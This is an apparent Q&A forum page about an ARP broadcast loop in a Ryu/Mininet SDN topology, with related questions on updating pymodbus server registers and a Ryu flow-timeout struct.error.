RYU Controller with ARP Loop (Python API Mininet) - python

Topology with a loop
I have a problem with an ARP loop. I have attached my Python API topology code and the simple_switch.py code that I use. As you can see in the picture, I cannot ping from h1 to h2. Can anyone help?
Here is my topology code:
#!/usr/bin/python
from mininet.node import Controller, RemoteController, OVSController
from mininet.net import Mininet
from mininet.node import OVSKernelSwitch, UserSwitch
from mininet.cli import CLI
from mininet.link import TCLink, Intf
from mininet.log import setLogLevel, info
def Topo1():
    net = Mininet(controller=RemoteController, switch=OVSKernelSwitch)

    info('*** Adding controller\n')
    c0 = net.addController(name='c0', controller=RemoteController,
                           ip='127.0.0.1', protocol='tcp', port=6633)

    info('*** Add hosts\n')
    h1 = net.addHost('h1')
    h2 = net.addHost('h2')

    info('*** Add switches\n')
    s1 = net.addSwitch('s1')
    s2 = net.addSwitch('s2')
    s3 = net.addSwitch('s3')
    s4 = net.addSwitch('s4')
    s5 = net.addSwitch('s5')

    s1.linkTo(h1)
    s1.linkTo(s2)
    s2.linkTo(s3)
    s2.linkTo(s4)
    s3.linkTo(s4)
    s4.linkTo(s5)
    s5.linkTo(h2)

    net.build()
    c0.start()

    info('*** Starting switches\n')
    net.get('s1').start([c0])
    net.get('s2').start([c0])
    net.get('s3').start([c0])
    net.get('s4').start([c0])
    net.get('s5').start([c0])

    info('*** Post configure switches and hosts\n')
    net.start()
    net.pingAll()
    CLI(net)
    net.stop()

if __name__ == '__main__':
    setLogLevel('info')
    Topo1()
Here is the simple_switch code for the Ryu remote controller. Does anyone know which part of the simple_switch code I need to extend to handle the ARP loop? Since I am not very good at this, would you mind letting me know what kind of code I should use?
from ryu.base import app_manager
from ryu.controller import ofp_event
from ryu.controller.handler import CONFIG_DISPATCHER, MAIN_DISPATCHER
from ryu.controller.handler import set_ev_cls
from ryu.ofproto import ofproto_v1_3
from ryu.lib.packet import packet
from ryu.lib.packet import ethernet
from ryu.lib.packet import ether_types


class SimpleSwitch13(app_manager.RyuApp):
    OFP_VERSIONS = [ofproto_v1_3.OFP_VERSION]

    def __init__(self, *args, **kwargs):
        super(SimpleSwitch13, self).__init__(*args, **kwargs)
        self.mac_to_port = {}

    @set_ev_cls(ofp_event.EventOFPSwitchFeatures, CONFIG_DISPATCHER)
    def switch_features_handler(self, ev):
        datapath = ev.msg.datapath
        ofproto = datapath.ofproto
        parser = datapath.ofproto_parser

        # install table-miss flow entry
        #
        # We specify NO BUFFER to max_len of the output action due to
        # OVS bug. At this moment, if we specify a lesser number, e.g.,
        # 128, OVS will send Packet-In with invalid buffer_id and
        # truncated packet data. In that case, we cannot output packets
        # correctly. The bug has been fixed in OVS v2.1.0.
        match = parser.OFPMatch()
        actions = [parser.OFPActionOutput(ofproto.OFPP_CONTROLLER,
                                          ofproto.OFPCML_NO_BUFFER)]
        self.add_flow(datapath, 0, match, actions)

    def add_flow(self, datapath, priority, match, actions, buffer_id=None):
        ofproto = datapath.ofproto
        parser = datapath.ofproto_parser

        inst = [parser.OFPInstructionActions(ofproto.OFPIT_APPLY_ACTIONS,
                                             actions)]
        if buffer_id:
            mod = parser.OFPFlowMod(datapath=datapath, buffer_id=buffer_id,
                                    priority=priority, match=match,
                                    instructions=inst)
        else:
            mod = parser.OFPFlowMod(datapath=datapath, priority=priority,
                                    match=match, instructions=inst)
        datapath.send_msg(mod)

    @set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)
    def _packet_in_handler(self, ev):
        # If you hit this you might want to increase
        # the "miss_send_length" of your switch
        if ev.msg.msg_len < ev.msg.total_len:
            self.logger.debug("packet truncated: only %s of %s bytes",
                              ev.msg.msg_len, ev.msg.total_len)
        msg = ev.msg
        datapath = msg.datapath
        ofproto = datapath.ofproto
        parser = datapath.ofproto_parser
        in_port = msg.match['in_port']

        pkt = packet.Packet(msg.data)
        eth = pkt.get_protocols(ethernet.ethernet)[0]

        if eth.ethertype == ether_types.ETH_TYPE_LLDP:
            # ignore lldp packet
            return
        dst = eth.dst
        src = eth.src

        dpid = datapath.id
        self.mac_to_port.setdefault(dpid, {})

        self.logger.info("packet in %s %s %s %s", dpid, src, dst, in_port)

        # learn a mac address to avoid FLOOD next time.
        self.mac_to_port[dpid][src] = in_port

        if dst in self.mac_to_port[dpid]:
            out_port = self.mac_to_port[dpid][dst]
        else:
            out_port = ofproto.OFPP_FLOOD

        actions = [parser.OFPActionOutput(out_port)]

        # install a flow to avoid packet_in next time
        if out_port != ofproto.OFPP_FLOOD:
            match = parser.OFPMatch(in_port=in_port, eth_dst=dst)
            # verify if we have a valid buffer_id, if yes avoid to send both
            # flow_mod & packet_out
            if msg.buffer_id != ofproto.OFP_NO_BUFFER:
                self.add_flow(datapath, 1, match, actions, msg.buffer_id)
                return
            else:
                self.add_flow(datapath, 1, match, actions)
        data = None
        if msg.buffer_id == ofproto.OFP_NO_BUFFER:
            data = msg.data

        out = parser.OFPPacketOut(datapath=datapath, buffer_id=msg.buffer_id,
                                  in_port=in_port, actions=actions, data=data)
        datapath.send_msg(out)
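For reference, the usual way to make this kind of learning switch survive a looped topology (here the s2-s3-s4 triangle) is to run spanning tree, so that flooding, including ARP broadcasts, cannot circulate forever. Below is a minimal sketch of that idea, loosely based on Ryu's bundled simple_switch_stp_13 example; the stplib context and event names come from that example and should be double-checked against your Ryu version.

# Sketch: simple_switch_13 extended with STP via ryu.lib.stplib, roughly
# following the simple_switch_stp_13 example shipped with Ryu.
from ryu.base import app_manager
from ryu.controller.handler import MAIN_DISPATCHER, set_ev_cls
from ryu.ofproto import ofproto_v1_3
from ryu.lib import dpid as dpid_lib
from ryu.lib import stplib


class SimpleSwitchSTP13(app_manager.RyuApp):
    OFP_VERSIONS = [ofproto_v1_3.OFP_VERSION]
    _CONTEXTS = {'stplib': stplib.Stp}   # let the STP library manage port states

    def __init__(self, *args, **kwargs):
        super(SimpleSwitchSTP13, self).__init__(*args, **kwargs)
        self.mac_to_port = {}
        self.stp = kwargs['stplib']

    @set_ev_cls(stplib.EventPacketIn, MAIN_DISPATCHER)
    def _packet_in_handler(self, ev):
        # stplib only delivers packet-ins on ports left in FORWARD state,
        # so ARP broadcasts no longer loop around s2-s3-s4.
        # ... same MAC-learning logic as in _packet_in_handler above ...
        pass

    @set_ev_cls(stplib.EventTopologyChange, MAIN_DISPATCHER)
    def _topology_change_handler(self, ev):
        # Drop learned MACs for this switch when the tree is recalculated.
        dpid = ev.dp.id
        self.mac_to_port.pop(dpid, None)
        self.logger.info("topology change at dpid=%s", dpid_lib.dpid_to_str(dpid))

If you only want to verify the ping, running the bundled app directly (ryu-manager ryu.app.simple_switch_stp_13) instead of plain simple_switch_13 should already stop the broadcast storm on this topology.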

Related

pymodbus: update context of running server

I have a running ModbusRTU server, following this example.
I know how to update the context, but I can't update the context of a running server.
When I update the context in the run_updating_server() function (before StartSerialServer()), it works fine.
But when I try to update the running context by calling updating_writer(context), it doesn't update.
Calling my own function getUpdatedContext() from within updating_writer() does not work either:
def updating_writer(a):
    a = (getContext(),)
    """ A worker process that runs every so often and
    updates live values of the context. It should be noted
    that there is a race condition for the update.
    :param arguments: The input arguments to the call
    """
    log.debug("updating the context")
    context = a[0]
    register = 3
    slave_id = 0x41
    address = 0x10
    values = context[slave_id].getValues(register, address, count=5)
    values = [v + 1 for v in values]
    log.debug("new values: " + str(values))
    context[slave_id].setValues(register, address, values)
getContext():
def getContext():
    store = ModbusSlaveContext(
        di=ModbusSequentialDataBlock(0, [17]*100),
        co=ModbusSequentialDataBlock(0, [17]*100),
        hr=ModbusSequentialDataBlock(0, [17]*100),
        ir=ModbusSequentialDataBlock(0, [17]*100))
    store.setValues(5, 1, [0])
    context = ModbusServerContext(slaves=store, single=True)
    return context
my full code:
#!/usr/bin/env python
import os
import sys
"""
Pymodbus Server With Updating Thread
--------------------------------------------------------------------------
This is an example of having a background thread updating the
context while the server is operating. This can also be done with
a python thread::
from threading import Thread
thread = Thread(target=updating_writer, args=(context,))
thread.start()
"""
# --------------------------------------------------------------------------- #
# import the modbus libraries we need
# --------------------------------------------------------------------------- #
from pymodbus.server.asynchronous import StartSerialServer
from pymodbus.device import ModbusDeviceIdentification
from pymodbus.datastore import ModbusSequentialDataBlock
from pymodbus.datastore import ModbusSlaveContext, ModbusServerContext
from pymodbus.transaction import ModbusRtuFramer, ModbusAsciiFramer
# --------------------------------------------------------------------------- #
# import the twisted libraries we need
# --------------------------------------------------------------------------- #
from twisted.internet.task import LoopingCall
# --------------------------------------------------------------------------- #
# configure the service logging
# --------------------------------------------------------------------------- #
import logging
logging.basicConfig()
log = logging.getLogger()
log.setLevel(logging.DEBUG)
# --------------------------------------------------------------------------- #
# define your callback process
# --------------------------------------------------------------------------- #
def updating_writer(a):
""" A worker process that runs every so often and
updates live values of the context. It should be noted
that there is a race condition for the update.
:param arguments: The input arguments to the call
"""
log.debug("updating the context")
context = a[0]
register = 3
slave_id = 0x41
address = 0x10
values = context[slave_id].getValues(register, address, count=5)
values = [v + 1 for v in values]
log.debug("new values: " + str(values))
context[slave_id].setValues(register, address, values)
def run_updating_server():
# ----------------------------------------------------------------------- #
# initialize your data store
# ----------------------------------------------------------------------- #
store = ModbusSlaveContext(
di=ModbusSequentialDataBlock(0, [17]*100),
co=ModbusSequentialDataBlock(0, [17]*100),
hr=ModbusSequentialDataBlock(0, [17]*100),
ir=ModbusSequentialDataBlock(0, [17]*100))
context = ModbusServerContext(slaves=store, single=True)
# ----------------------------------------------------------------------- #
# initialize the server information
# ----------------------------------------------------------------------- #
identity = ModbusDeviceIdentification()
identity.VendorName = 'pymodbus'
identity.ProductCode = 'PM'
identity.VendorUrl = 'http://github.com/bashwork/pymodbus/'
identity.ProductName = 'pymodbus Server'
identity.ModelName = 'pymodbus Server'
identity.MajorMinorRevision = '2.2.0'
# ----------------------------------------------------------------------- #
# run the server you want
# ----------------------------------------------------------------------- #
time = 5
loop = LoopingCall(f=updating_writer, a=(context,))
loop.start(time, now=False) # initially delay by time
log.debug("::: Starting Modbus RTU server :::")
# RTU:
StartSerialServer(context, framer=ModbusRtuFramer, identity=identity,
port='/dev/ttyUSB0',
timeout=2,
baudrate=115200,
parity='E',
bytesize=8,
stopbits=1)
def main():
pid = str(os.getpid())
filename = 'modbusUpdatingServer.pid'
pidfile = str(os.getcwd()) + '/' + filename
if os.path.isfile(pidfile):
print (filename + " already exists \n exiting")
sys.exit()
open(pidfile, 'w').write(pid)
try:
# run server
run_updating_server()
finally:
os.unlink(pidfile)
if __name__ == "__main__":
main()
I want to update the context from another Python script. I tried:
- calling updating_writer(a) from that 'other Python script', where a = updatedContext;
- calling getUpdatedContext() from within updating_writer(a), where getUpdatedContext() is a function in that other script which returns the updated context;
- making the context global, adding a function updateContext(a), and calling that function from the other script.
It all compiled and ran, but the context of the running server never got updated.
Here is the code from the 'other python script':
from pymodbus.datastore import ModbusSequentialDataBlock, ModbusSlaveContext, ModbusServerContext
from threading import Thread
import os
import subprocess
import sys
from modbusUpdatingServer import updating_writer, run_updating_server

def writeUpdatedContext():
    store = ModbusSlaveContext(
        di=ModbusSequentialDataBlock(0, [17]*100),
        co=ModbusSequentialDataBlock(0, [17]*100),
        hr=ModbusSequentialDataBlock(0, [17]*100),
        ir=ModbusSequentialDataBlock(0, [17]*100))
    store.setValues(5, 1, [0])
    context = ModbusServerContext(slaves=store, single=True)
    updating_writer(a=(context,))

def main():
    choice = input("press x if you want to update the context")
    if choice == 'x' or choice == 'X':
        writeUpdatedContext()

if __name__ == "__main__":
    main()
How am I supposed to interact with updating_writer?
What I want to achieve is to have my Modbus RTU server running and to update its context from another thread, so my Modbus client (master) can read the registers I've filled.
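One thing worth spelling out: the ModbusServerContext is just an in-memory object owned by the server process. A second script that builds its own ModbusSlaveContext/ModbusServerContext (as writeUpdatedContext() does) creates a completely separate datastore, so the running server never sees those writes. The update has to happen on the very same context object inside the server process, e.g. from a thread or your existing LoopingCall. A minimal sketch of that idea, assuming pymodbus 2.x and using the synchronous TCP server for brevity (the same pattern applies to your StartSerialServer):

# Sketch: one context shared between the Modbus server and an updater thread.
# Register/address numbers are only illustrative.
import time
from threading import Thread

from pymodbus.server.sync import StartTcpServer
from pymodbus.datastore import (ModbusSequentialDataBlock,
                                ModbusSlaveContext, ModbusServerContext)

store = ModbusSlaveContext(hr=ModbusSequentialDataBlock(0, [17] * 100))
context = ModbusServerContext(slaves=store, single=True)

def updater(ctx):
    # Runs in the same process, so it touches the live datastore the server serves.
    while True:
        values = ctx[0].getValues(3, 0x10, count=5)        # 3 = holding registers
        ctx[0].setValues(3, 0x10, [v + 1 for v in values])
        time.sleep(5)

t = Thread(target=updater, args=(context,))
t.daemon = True
t.start()
StartTcpServer(context, address=("localhost", 5020))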

How do I assign holding registers in pymodbus?

I am making a Modbus server on a Raspberry Pi Zero to send data to a Modbus client/data logger. I am trying to use pymodbus, but I am having trouble following the documentation; could someone show me how to assign specific values to a holding register? I am using the Synchronous Server Example as my starting point. I am fairly new to Python and really need to understand what is going on in this code/program so that I can make changes if I need to. Any help would be appreciated.
#!/usr/bin/env python
"""
Pymodbus Synchronous Server Example
--------------------------------------------------------------------------
The synchronous server is implemented in pure python without any third
party libraries (unless you need to use the serial protocols which require
pyserial). This is helpful in constrained or old environments where using
twisted is just not feasible. What follows is an example of its use:
"""
# --------------------------------------------------------------------------- #
# import the various server implementations
# --------------------------------------------------------------------------- #
from pymodbus.server.sync import StartTcpServer
from pymodbus.server.sync import StartUdpServer
from pymodbus.server.sync import StartSerialServer
from pymodbus.device import ModbusDeviceIdentification
from pymodbus.datastore import ModbusSequentialDataBlock, ModbusSparseDataBlock
from pymodbus.datastore import ModbusSlaveContext, ModbusServerContext
from pymodbus.transaction import ModbusRtuFramer, ModbusBinaryFramer
# --------------------------------------------------------------------------- #
# configure the service logging
# --------------------------------------------------------------------------- #
import logging
FORMAT = ('%(asctime)-15s %(threadName)-15s'
' %(levelname)-8s %(module)-15s:%(lineno)-8s %(message)s')
logging.basicConfig(format=FORMAT)
log = logging.getLogger()
log.setLevel(logging.DEBUG)
def run_server():
# ----------------------------------------------------------------------- #
# initialize your data store
# ----------------------------------------------------------------------- #
# The datastores only respond to the addresses that they are initialized to
# Therefore, if you initialize a DataBlock to addresses of 0x00 to 0xFF, a
# request to 0x100 will respond with an invalid address exception. This is
# because many devices exhibit this kind of behavior (but not all)::
#
# block = ModbusSequentialDataBlock(0x00, [0]*0xff)
#
# Continuing, you can choose to use a sequential or a sparse DataBlock in
# your data context. The difference is that the sequential has no gaps in
# the data while the sparse can. Once again, there are devices that exhibit
# both forms of behavior::
#
# block = ModbusSparseDataBlock({0x00: 0, 0x05: 1})
# block = ModbusSequentialDataBlock(0x00, [0]*5)
#
# Alternately, you can use the factory methods to initialize the DataBlocks
# or simply do not pass them to have them initialized to 0x00 on the full
# address range::
#
# store = ModbusSlaveContext(di = ModbusSequentialDataBlock.create())
# store = ModbusSlaveContext()
#
# Finally, you are allowed to use the same DataBlock reference for every
# table or you may use a separate DataBlock for each table.
# This depends if you would like functions to be able to access and modify
# the same data or not::
#
# block = ModbusSequentialDataBlock(0x00, [0]*0xff)
# store = ModbusSlaveContext(di=block, co=block, hr=block, ir=block)
#
# The server then makes use of a server context that allows the server to
# respond with different slave contexts for different unit ids. By default
# it will return the same context for every unit id supplied (broadcast
# mode).
# However, this can be overloaded by setting the single flag to False and
# then supplying a dictionary of unit id to context mapping::
#
# slaves = {
# 0x01: ModbusSlaveContext(...),
# 0x02: ModbusSlaveContext(...),
# 0x03: ModbusSlaveContext(...),
# }
# context = ModbusServerContext(slaves=slaves, single=False)
#
# The slave context can also be initialized in zero_mode which means that a
# request to address(0-7) will map to the address (0-7). The default is
# False which is based on section 4.4 of the specification, so address(0-7)
# will map to (1-8)::
#
# store = ModbusSlaveContext(..., zero_mode=True)
# ----------------------------------------------------------------------- #
store = ModbusSlaveContext(
di=ModbusSequentialDataBlock(0, [17]*100),
co=ModbusSequentialDataBlock(0, [17]*100),
hr=ModbusSequentialDataBlock(0, [17]*100),
ir=ModbusSequentialDataBlock(0, [17]*100))
context = ModbusServerContext(slaves=store, single=True)
# ----------------------------------------------------------------------- #
# initialize the server information
# ----------------------------------------------------------------------- #
# If you don't set this or any fields, they are defaulted to empty strings.
# ----------------------------------------------------------------------- #
identity = ModbusDeviceIdentification()
identity.VendorName = 'Pymodbus'
identity.ProductCode = 'PM'
identity.VendorUrl = 'http://github.com/riptideio/pymodbus/'
identity.ProductName = 'Pymodbus Server'
identity.ModelName = 'Pymodbus Server'
identity.MajorMinorRevision = '1.5'
# ----------------------------------------------------------------------- #
# run the server you want
# ----------------------------------------------------------------------- #
# Tcp:
StartTcpServer(context, identity=identity, address=("localhost", 5020))
# TCP with different framer
# StartTcpServer(context, identity=identity,
# framer=ModbusRtuFramer, address=("0.0.0.0", 5020))
# Udp:
# StartUdpServer(context, identity=identity, address=("0.0.0.0", 5020))
# Ascii:
# StartSerialServer(context, identity=identity,
# port='/dev/ttyp0', timeout=1)
# RTU:
# StartSerialServer(context, framer=ModbusRtuFramer, identity=identity,
# port='/dev/ttyp0', timeout=.005, baudrate=9600)
# Binary
# StartSerialServer(context,
# identity=identity,
# framer=ModbusBinaryFramer,
# port='/dev/ttyp0',
# timeout=1)
if __name__ == "__main__":
run_server()
It looks like I am using the wrong server and should be using the callback server, but I am still unsure how to assign data read in from a local sensor/device to an input/holding register. Here is the code for the callback server:
#!/usr/bin/env python
"""
Pymodbus Server With Callbacks
--------------------------------------------------------------------------
This is an example of adding callbacks to a running modbus server
when a value is written to it. In order for this to work, it needs
a device-mapping file.
"""
# --------------------------------------------------------------------------- #
# import the modbus libraries we need
# --------------------------------------------------------------------------- #
from pymodbus.server.async import StartTcpServer
from pymodbus.device import ModbusDeviceIdentification
from pymodbus.datastore import ModbusSparseDataBlock
from pymodbus.datastore import ModbusSlaveContext, ModbusServerContext
from pymodbus.transaction import ModbusRtuFramer, ModbusAsciiFramer
# --------------------------------------------------------------------------- #
# import the python libraries we need
# --------------------------------------------------------------------------- #
from multiprocessing import Queue, Process
# --------------------------------------------------------------------------- #
# configure the service logging
# --------------------------------------------------------------------------- #
import logging
logging.basicConfig()
log = logging.getLogger()
log.setLevel(logging.DEBUG)
# --------------------------------------------------------------------------- #
# create your custom data block with callbacks
# --------------------------------------------------------------------------- #
class CallbackDataBlock(ModbusSparseDataBlock):
""" A datablock that stores the new value in memory
and passes the operation to a message queue for further
processing.
"""
def __init__(self, devices, queue):
"""
"""
self.devices = devices
self.queue = queue
values = {k: 0 for k in devices.keys()}
values[0xbeef] = len(values) # the number of devices
super(CallbackDataBlock, self).__init__(values)
def setValues(self, address, value):
""" Sets the requested values of the datastore
:param address: The starting address
:param values: The new values to be set
"""
super(CallbackDataBlock, self).setValues(address, value)
self.queue.put((self.devices.get(address, None), value))
# --------------------------------------------------------------------------- #
# define your callback process
# --------------------------------------------------------------------------- #
def rescale_value(value):
""" Rescale the input value from the range
of 0..100 to -3200..3200.
:param value: The input value to scale
:returns: The rescaled value
"""
s = 1 if value >= 50 else -1
c = value if value < 50 else (value - 50)
return s * (c * 64)
def device_writer(queue):
""" A worker process that processes new messages
from a queue to write to device outputs
:param queue: The queue to get new messages from
"""
while True:
device, value = queue.get()
scaled = rescale_value(value[0])
log.debug("Write(%s) = %s" % (device, value))
if not device: continue
# do any logic here to update your devices
# --------------------------------------------------------------------------- #
# initialize your device map
# --------------------------------------------------------------------------- #
def read_device_map(path):
""" A helper method to read the device
path to address mapping from file::
0x0001,/dev/device1
0x0002,/dev/device2
:param path: The path to the input file
:returns: The input mapping file
"""
devices = {}
with open(path, 'r') as stream:
for line in stream:
piece = line.strip().split(',')
devices[int(piece[0], 16)] = piece[1]
return devices
def run_callback_server():
# ----------------------------------------------------------------------- #
# initialize your data store
# ----------------------------------------------------------------------- #
queue = Queue()
devices = read_device_map("device-mapping")
block = CallbackDataBlock(devices, queue)
store = ModbusSlaveContext(di=block, co=block, hr=block, ir=block)
context = ModbusServerContext(slaves=store, single=True)
# ----------------------------------------------------------------------- #
# initialize the server information
# ----------------------------------------------------------------------- #
identity = ModbusDeviceIdentification()
identity.VendorName = 'pymodbus'
identity.ProductCode = 'PM'
identity.VendorUrl = 'http://github.com/bashwork/pymodbus/'
identity.ProductName = 'pymodbus Server'
identity.ModelName = 'pymodbus Server'
identity.MajorMinorRevision = '1.0'
# ----------------------------------------------------------------------- #
# run the server you want
# ----------------------------------------------------------------------- #
p = Process(target=device_writer, args=(queue,))
p.start()
StartTcpServer(context, identity=identity, address=("localhost", 5020))
if __name__ == "__main__":
run_callback_server()
Again any help is appreciated.
from pymodbus.client.sync import ModbusTcpClient
address = 2 #register address
value = 12 #new value
unitId = 1
host = "127.0.0.1"
port = 502
client = ModbusTcpClient(host, port)
client.connect()
client.write_register(address,value,unit=unitId)
There are 2 basic function codes here (for reading/writing coils and holding registers): https://github.com/omergunal/Modbus-Web-Interface/blob/master/app.py
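On the server side, holding registers live in the hr block of the ModbusSlaveContext, and you can write to them at any time with setValues(). A minimal sketch (function code 3 selects the holding-register table; the register address and the publish_reading() helper are only illustrative):

# Sketch: pushing a locally read sensor value into a holding register.
from pymodbus.datastore import (ModbusSequentialDataBlock,
                                ModbusSlaveContext, ModbusServerContext)

store = ModbusSlaveContext(
    di=ModbusSequentialDataBlock(0, [0] * 100),
    co=ModbusSequentialDataBlock(0, [0] * 100),
    hr=ModbusSequentialDataBlock(0, [0] * 100),
    ir=ModbusSequentialDataBlock(0, [0] * 100))
context = ModbusServerContext(slaves=store, single=True)

def publish_reading(reading):
    # Hypothetical helper: write one value to holding register address 0x01.
    context[0x00].setValues(3, 0x01, [int(reading)])

Call publish_reading() from whatever loop or thread reads your sensor while the server is running (for example via the LoopingCall pattern from the updating-server example above).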

Ryu controller struct.error when adding a new table flow

I'm writing a Ryu L4 switch application and I am trying to do the following: when a TCP/UDP packet is identified, the application checks a local database to see whether the packet parameters (source IP, destination IP and destination port) match a known attacker.
If the packet matches an entry in the attacker database, a flow is added to the switch to drop that specific packet (this flow has a duration of 2 hours); if the packet doesn't match, a flow is added to forward it to a specific switch port (this flow has a duration of 5 minutes).
The problem is that when the controller sends the new flow to the switch/datapath I receive the following error:
SimpleSwitch13: Exception occurred during handler processing. Backtrace from offending handler [_packet_in_handler] servicing event [EventOFPPacketIn] follows.
Traceback (most recent call last):
File "/root/SecAPI/Code/lib/python3.5/site-packages/ryu/base/app_manager.py", line 290, in _event_loop
handler(ev)
File "/root/SecAPI/Flasks/Code/SDN/switchL3.py", line 237, in _packet_in_handler
self.add_security_flow(datapath, 1, match, actions)
File "/root/SecAPI/Flasks/Code/SDN/switchL3.py", line 109, in add_security_flow
datapath.send_msg(mod)
File "/root/SecAPI/Code/lib/python3.5/site-packages/ryu/controller/controller.py", line 423, in send_msg
msg.serialize()
File "/root/SecAPI/Code/lib/python3.5/site-packages/ryu/ofproto/ofproto_parser.py", line 270, in serialize
self._serialize_body()
File "/root/SecAPI/Code/lib/python3.5/site-packages/ryu/ofproto/ofproto_v1_3_parser.py", line 2738, in _serialize_body
self.out_group, self.flags)
File "/root/SecAPI/Code/lib/python3.5/site-packages/ryu/lib/pack_utils.py", line 25, in msg_pack_into
struct.pack_into(fmt, buf, offset, *args)
struct.error: 'H' format requires 0 <= number <= 65535
Here's my full code:
from ryu.base import app_manager
from ryu.controller import ofp_event
from ryu.controller.handler import CONFIG_DISPATCHER, MAIN_DISPATCHER
from ryu.controller.handler import set_ev_cls
from ryu.ofproto import ofproto_v1_3
from ryu.lib.packet import packet
from ryu.lib.packet import ethernet
from ryu.lib.packet import ether_types
from ryu.lib.packet import ipv4
from ryu.lib.packet import tcp
from ryu.lib.packet import udp
from ryu.lib.packet import in_proto
import sqlite3
class SimpleSwitch13(app_manager.RyuApp):
OFP_VERSIONS = [ofproto_v1_3.OFP_VERSION]
def __init__(self, *args, **kwargs):
super(SimpleSwitch13, self).__init__(*args, **kwargs)
self.mac_to_port = {}
self.initial = True
self.security_alert = False
@set_ev_cls(ofp_event.EventOFPSwitchFeatures, CONFIG_DISPATCHER)
def switch_features_handler(self, ev):
datapath = ev.msg.datapath
ofproto = datapath.ofproto
parser = datapath.ofproto_parser
match = parser.OFPMatch()
self.initial = True
actions = [parser.OFPActionOutput(ofproto.OFPP_CONTROLLER,
ofproto.OFPCML_NO_BUFFER)]
self.add_flow(datapath, 0, match, actions)
self.initial = False
# Adds a flow into a specific datapath, with a hard_timeout of 5 minutes.
# Meaning that a certain packet flow ceases existing after 5 minutes.
def add_flow(self, datapath, priority, match, actions, buffer_id=None):
ofproto = datapath.ofproto
parser = datapath.ofproto_parser
inst = [parser.OFPInstructionActions(ofproto.OFPIT_APPLY_ACTIONS,
actions)]
if buffer_id:
if self.initial == True:
mod = parser.OFPFlowMod(datapath=datapath, buffer_id=buffer_id,
priority=priority, match=match,
instructions=inst)
elif self.initial == False:
mod = parser.OFPFlowMod(datapath=datapath, buffer_id=buffer_id,
priority=priority, match=match,
instructions=inst,hard_timeout=300)
else:
if self.initial == True:
mod = parser.OFPFlowMod(datapath=datapath, priority=priority,
match=match, instructions=inst)
elif self.initial == False:
mod = parser.OFPFlowMod(datapath=datapath, priority=priority,
match=match, instructions=inst,
hard_timeout=300)
datapath.send_msg(mod)
# Adds a security flow into the controlled device, a secured flow differs from a normal
# flow in it's duration, a security flow has a duration of 2 hours.
def add_security_flow(self, datapath, priority, match, actions, buffer_id=None):
ofproto = datapath.ofproto
parser = datapath.ofproto_parser
#inst = [parser.OFPInstructionActions(ofproto.OFPIT_APPLY_ACTIONS,
# actions)]
inst = [parser.OFPInstructionActions(ofproto.OFPIT_CLEAR_ACTIONS, [])]
if buffer_id:
mod = parser.OFPFlowMod(datapath=datapath, buffer_id=buffer_id,
priority=priority,match=match,command=ofproto.OFPFC_ADD,
instructions=inst, hard_timeout=432000)
else:
mod = parser.OFPFlowMod(datapath=datapath, priority=priority,
match=match, instructions=inst, command=ofproto.OFPFC_ADD,
hard_timeout=432000)
datapath.send_msg(mod)
# Deletes a already existing flow that matches has a given packet match.
def del_flow(self, datapath, priority, match, actions, buffer_id=None):
ofproto = datapath.ofproto
parser = datapath.ofproto_parser
inst = [parser.OFPInstructionActions(ofproto.OFPIT_APPLY_ACTIONS,
actions)]
if buffer_id:
mod = parser.OFPFlowMod(datapath=datapath,buffer_id=buffer_id,
priority=priority, match=match, instructions=inst,
command=ofproto.OFPFC_DELETE)
else:
mod = parser.OFPFlowMod(datapath=datapath, priority=priority,
match=match, instructions=inst,
command=ofproto.OFPFC_DELETE)
datapath.send_msg(mod)
@set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)
def _packet_in_handler(self, ev):
# If you hit this you might want to increase
# the "miss_send_length" of your switch
if ev.msg.msg_len < ev.msg.total_len:
self.logger.debug("packet truncated: only %s of %s bytes",
ev.msg.msg_len, ev.msg.total_len)
msg = ev.msg
datapath = msg.datapath
ofproto = datapath.ofproto
parser = datapath.ofproto_parser
in_port = msg.match['in_port']
pkt = packet.Packet(msg.data)
eth = pkt.get_protocols(ethernet.ethernet)[0]
if eth.ethertype == ether_types.ETH_TYPE_LLDP:
# ignore lldp packet
return
dst = eth.dst
src = eth.src
dpid = datapath.id
self.mac_to_port.setdefault(dpid, {})
self.logger.info("packet in %s %s %s %s", dpid, src, dst, in_port)
# learn a mac address to avoid FLOOD next time.
self.mac_to_port[dpid][src] = in_port
if dst in self.mac_to_port[dpid]:
out_port = self.mac_to_port[dpid][dst]
else:
out_port = ofproto.OFPP_FLOOD
actions = [parser.OFPActionOutput(out_port)]
# install a flow to avoid packet_in next time
if out_port != ofproto.OFPP_FLOOD:
#match = parser.OFPMatch(in_port=in_port, eth_dst=dst, eth_src=src)
# check IP Protocol and create a match for IP
if eth.ethertype == ether_types.ETH_TYPE_IP:
conn = sqlite3.connect("database/sdnDatabase.db")
cursor = conn.cursor()
ip = pkt.get_protocol(ipv4.ipv4)
srcip = ip.src
dstip = ip.dst
#match = parser.OFPMatch(eth_type=ether_types.ETH_TYPE_IP,ipv4_src=srcip,ipv4_dst=dstip)
protocol = ip.proto
# ICMP Protocol
if protocol == in_proto.IPPROTO_ICMP:
print("WARN - We have a ICMP packet")
cursor.execute('select id from knownAttackers where srcaddr = \"{0}\" and dstaddr = \"{1}\" and protocol = "icmp";'.format(srcip, dstip))
result = cursor.fetchall()
match = parser.OFPMatch(eth_type=ether_types.ETH_TYPE_IP, ipv4_src=srcip, ipv4_dst=dstip,
ip_proto=protocol)
if len(result) == 0:
self.security_alert = False
else:
self.security_alert = True
# TCP Protocol
elif protocol == in_proto.IPPROTO_TCP:
print("WARN - We have a TCP packet")
t = pkt.get_protocol(tcp.tcp)
cursor.execute('select id from knownAttackers where srcaddr = \"{0}\" and dstaddr = \"{1}\" and dstport = \"{2}\" and protocol = "tcp";'.format(srcip, dstip, t.dst_port))
result = cursor.fetchall()
match = parser.OFPMatch(eth_type=ether_types.ETH_TYPE_IP, ipv4_src=srcip, ipv4_dst=dstip,
ip_proto=protocol, tcp_dst=t.dst_port)
if len(result) == 0:
self.security_alert = False
else:
print("We have a register in the database for this specific packet: {0}".format(result))
self.security_alert = True
# UDP Protocol
elif protocol == in_proto.IPPROTO_UDP:
print("WARN - We have a UDP packet")
u = pkt.get_protocol(udp.udp)
cursor.execute('select id from knownAttackers where srcaddr = \"{0}\" and dstaddr = \"{1}\" and dstport = \"{2}\" and protocol = "udp";'.format(srcip, dstip, u.dst_port))
result = cursor.fetchall()
match = parser.OFPMatch(eth_type=ether_types.ETH_TYPE_IP, ipv4_src=srcip, ipv4_dst=dstip,
ip_proto=protocol, udp_dst=u.dst_port)
if len(result) == 0:
self.security_alert = False
else:
self.security_alert = True
